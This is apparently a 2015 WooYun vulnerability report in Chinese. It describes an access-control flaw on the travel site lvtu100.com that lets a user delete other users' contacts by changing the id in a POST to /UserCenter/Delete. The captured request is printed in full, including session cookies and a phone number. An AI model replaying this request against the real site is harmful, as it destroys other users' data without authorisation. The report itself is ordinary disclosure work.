当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107728

漏洞标题:旅途100可删除任意用户联系人(涉及8W多数据)

相关厂商:旅途100

漏洞作者: wood425

提交时间:2015-04-15 19:10

修复时间:2015-05-30 19:12

公开时间:2015-05-30 19:12

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

旅途100可删除任意用户联系人(涉及8W多数据)

详细说明:

21.png


两个账号,删除联系人,抓包

POST /UserCenter/Delete HTTP/1.1
Host: www.lvtu100.com:8081
Proxy-Connection: keep-alive
Content-Length: 8
Accept: */*
Origin: http://www.lvtu100.com:8081
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.lvtu100.com:8081/UserCenter/Contacts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=b4pkw3vqd0y5fzrubw1xnx0s; pgv_pvi=8561523712; pgv_si=s2419393536; phone=18075958330; lt_s_u=ED246292D1C985471266BB56ADFA2256; c_t_l=1654CBEC3FD30C65; ts=9927e4ddb82a6c3faf659c38084e7cd4; jiathis_rdc=%7B%22http%3A//www.lvtu100.com/Login/ForgetPwd%22%3A-1292842139%2C%22http%3A//www.lvtu100.com/Login%3FredirectURL%3Dhttp%3A//www.lvtu100.com%3A8081/UserCenter/OrderDetail%3ForderId%3D150413213311664%22%3A-1292837084%2C%22http%3A//www.lvtu100.com/Reg%22%3A-1292835072%2C%22http%3A//www.lvtu100.com/Reg/Agreement%22%3A-1292729609%2C%22http%3A//www.lvtu100.com/Activity%22%3A-1292727615%2C%22http%3A//www.lvtu100.com/UserCenter%22%3A-1292725073%2C%22http%3A//www.lvtu100.com/UserCenter/OrderDetail%3ForderId%3D150413213311664%22%3A-1292502150%2C%22http%3A//www.lvtu100.com/UserCenter/Contacts%22%3A-1291236636%2C%22http%3A//www.lvtu100.com/UserCenter/ContactMod%3Fid%3D81242%22%3A-1291231566%2C%22http%3A//www.lvtu100.com/UserCenter/OrderDetail%3ForderId%3D150413212761251%22%3A-1290421101%2C%22http%3A//www.lvtu100.com/%22%3A-1290306177%2C%22http%3A//www.lvtu100.com/Login%22%3A-1290308907%2C%22http%3A//www.lvtu100.com%3A8081/Order/OrderDetail%3ForderId%3D150413212761251%22%3A-1290291684%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter%22%3A-1290274181%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81239%22%3A-1290217028%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactAdd%22%3A-1290064935%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81211%22%3A-1287580276%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D8121%22%3A-1287571431%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81231%22%3A-1287428094%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81238%22%3A-1287424133%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81230%22%3A-1287370810%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81228%22%3A-1287347558%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81210%22%3A-1287268036%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D8125%22%3A-1287214312%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D810%22%3A-1287024015%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81246%22%3A0%7C1428937210705%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/Contacts%22%3A%220%7C1428937405588%22%7D; Hm_lvt_f64a581bfdfaef6e87f7d985c57ee087=1428931263; Hm_lpvt_f64a581bfdfaef6e87f7d985c57ee087=1428937406
id=81242


修改id,成功删除

32.png

漏洞证明:

如上

修复方案:

版权声明:转载请注明来源 wood425@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝